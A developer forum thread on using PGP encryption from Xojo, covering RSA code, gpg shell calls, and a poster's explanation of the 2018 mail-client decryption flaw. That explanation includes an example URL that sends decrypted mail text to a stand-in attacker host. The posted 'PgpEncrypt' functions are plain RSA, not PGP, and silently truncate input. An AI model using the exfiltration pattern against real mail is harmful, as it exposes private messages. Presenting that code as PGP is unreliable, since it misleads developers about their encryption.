Hello everyone,
So, I want to use PGP Public Key encryption on a txt file using Xojo. I have checked the Crypto library but I could not find anything on PGP, only RSA and Hashing. My cryptography knowledge is kinda rusty, but if I recall correctly RSA is different from PGP. Is there some way to use PGP with Xojo?
Thank you in advance for your help.
The easiest way, pure Xojo:
[code]Function PgpDecrypt(ToDecrypt as String, myPrivateKey as string) As String
// Description: Decrypt input-string with parameter myPrivateKey or, when not given
// then decrypt input-string with the PrivateKeyy
Try
If myPrivateKey <> "" Then
Dim sToDecrypt As String = DecodeHex(ToDecrypt)
Dim msg As New MemoryBlock(Len(sToDecrypt))
msg = sToDecrypt
Dim decryptedData As MemoryBlock = Crypto.RSADecrypt(msg, myPrivateKey)
If decryptedData <> Nil Then
Return decryptedData
Else
Return ""
End If
Else
Return ""
End If
Catch err As Runtimeexception
Return ""
End Try
End Function
Function PgpEncrypt(ToEncrypt as String, myPublicKey as String) As String
// Description: Encrypt input-string with parameter myPublicKey or, when not given
// then encrypt input-string with the PublicKey
// WARNING : max length of ‘ToEncrypt’ = 86 characters
Try
If myPublicKey <> "" Then
Dim msg As New MemoryBlock(Len(ToEncrypt))
// max length of input for crypto.RSAEncrypt seems to be 86 characters.
// so if my input is more than 86 characters and RuntimeException should be raised,
msg = DefineEncoding(Left(ToEncrypt,86), Nil)
Dim encryptedData As MemoryBlock = Crypto.RSAEncrypt(msg, myPublicKey)
If encryptedData <> Nil Then
Return EncodeHex(encryptedData)
Else
Return ""
End If
Else
Return ""
End If
Catch err As Runtimeexception
Return ""
End Try
End Function[/code]
Thank you for the quick reply, will try it let you know 
I got a Crypto exception “BER Decode Error”. I guess it is from the key format, which is string and looks something like this:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP Universal 2.9.1 (Build 347)
mQMuBFG3x4URCACZ/c7PjmPwOy2qIyKAYRftIT7YurxmZ/wQEwkyLJ4R+A2mFAvw
EfdVjghAKwnXxqeZO9WyAEofqIX5ewXD9J4H6THaWNlDeNwnIUhbVsSEgT6iwGEG
arXvkrMyy+U5KA0x2dcsYRKAPMM1db+4zSQkWTWzufLU7lcKi3gU3pNTxSA0DjCn
wfJQspiyWchSfgZ59+fKaGZJVSElrS2i2ok5mK3ywCXRWvnAC/VxA3N6T4jvkX/+
1gS/oUgdocP31TeV0L20JH9QgmFYC3jMbErAATo2x9Y8g4NofdvSnntbZk9Giycc
…
to3UsZXERO4NtVI0IT0uhLXh+IhhBBgRCAAJBQJRt8eFAhsMAAoJELiVbb/ufBBc
QjgA/j1J7nN42zDMJxoAKQDvp+H3dErZVY7hJ8qHeGVbExWGAP97G/jWhl6FEg7M
2vOMWRC5GQUM8TU1YkCeAuhsxSj3ew==
=dgnf
-----END PGP PUBLIC KEY BLOCK-----
From what I saw the xojo created PSA keys are hex. How do I convert it to that?
Remove the “Encodehex” from the code.
No idea.
As PGP is GPL licensed, we do not have a Plugin, but you can use the command line tools via shell.
I am using GpG4win for the encoding, and when I run the commands from the cmd I have no issues. But when I run them through Xojo the shell does not seem to recognize the commands.
The command is “gpg --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt”.
Are we sure that xojo can execute commands from a third party like the above?
How does your code look like exactly? What error do you get?
Most likely you need the full path to gpg .
Here is the current code.
Dim textOutput As TextOutputStream
Dim fPaste As FolderItem
fPaste = specialFolder.Desktop.Child(“Temp.bat”)
textOutput = TextOutputStream.Create(fPaste)
textOutput.WriteLine(“gpg --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt”)
dim s as new Shell
s.execute(“start c:\Users\Vasilis\Desktop\Temp.bat”)
In this attempt I have made a .bat file and tried to run it through that.
The file gets created, but the message I get (because I used start) through the cmd is “gpg is not recognized as an internal or external command”. BUT, when I run the .bat manually it gets executed and it creates my encoded file.
PS: I have tried “c:\Program Files (x86)\GnuPG\bin\gpg.exe --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt”
and “c:\Program Files (x86)\GnuPG\bin\gpg --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt” and I get c:\Program is not recognized as an internal or external command".
the PGP standard is an RFC (https://www.ietf.org/rfc/rfc4880.txt) and you can use it as you see fit. but if you use the PGP/GPG source then you are limited to GPL.
Note that security experts have recently found a major flaw in pgp (or gpg) in email usage. Perhaps other uses too.
“pgp security issue 2018”
there is more to be found on google about this.
Hello @Derk Jochems,
that’s not realy a flaw of pgp /gpg for that matter. The actual Version’s Correctly detect the Manipulation of the “Encrypted” Message.
The Problem is the default Handly of the Mail SW Plugins for gpg /pgp Auto-Decrypting everything and not checking the Manipulation Code (MDC). The GPG CLI Apps fails the decryption if it’s not correct. It’s is the Mail “Plugins” which don’t check an simply decrypt the Mail.
If they would check and fail (or at least a SoftFail) with an Error / Message the user would that something is wrong. and know about the broken mail and could potentially abort the decryption?!
It’s not breaking the Encryption (RSA or else, or the OpenPGP Standart) it’s not even exfiltering yout Keys - It’s simply be able to send you an old Encrypted - E-Mail an Manipulate it so that the (through the Mail Programms Auto-Decryption function) the Encrypted Mail get’s Decrypted and as an URL “Post” Code, posted back via HTML back to the Attacker (like: http://evil-url.com/mail.php?Decrypted%20Mail%20Text, usw.)
PS: Same Back-Channel trick is “sometimes” used by SPAMMERS and SCAMMER to check an E-Mail Adress “correctness” - nothing new about that.
And i also Think HTML(-Mails) and Secure Encryption (PGP) don’t go together. A Encrypted Mail should simply be Plain-Text.
Or if the Mail has to be HTML atleats the Mail Plugin should simply block external URL / Links till you allow it (or the the loading) Manually.
PS: And i don’t thnik Signal (spocken for by the Bug-Team and the EFF) is safer to use at the moment. A new Electron CVE is also compromissing the Security of the Signal App.)
Sorry, i hat do say something. - The news Around here are like the Crypto is brocken. It’s not the Crypto that is brocken it simply is the Handling of the Decryption with an broken MDC of an Encrypted Message by the Mail Clients which makes this “Bug” Possible.
PPS: Enigmail in Thunderbird does this correctly.
It’s a bit like an SQL Injection Bug (the Software not Sanatizing the Input) XKCD: Exploits of a Mom 
Best Regards,
René Landscheidt
At least you filled it with more information, now we all have some more insights in what is what…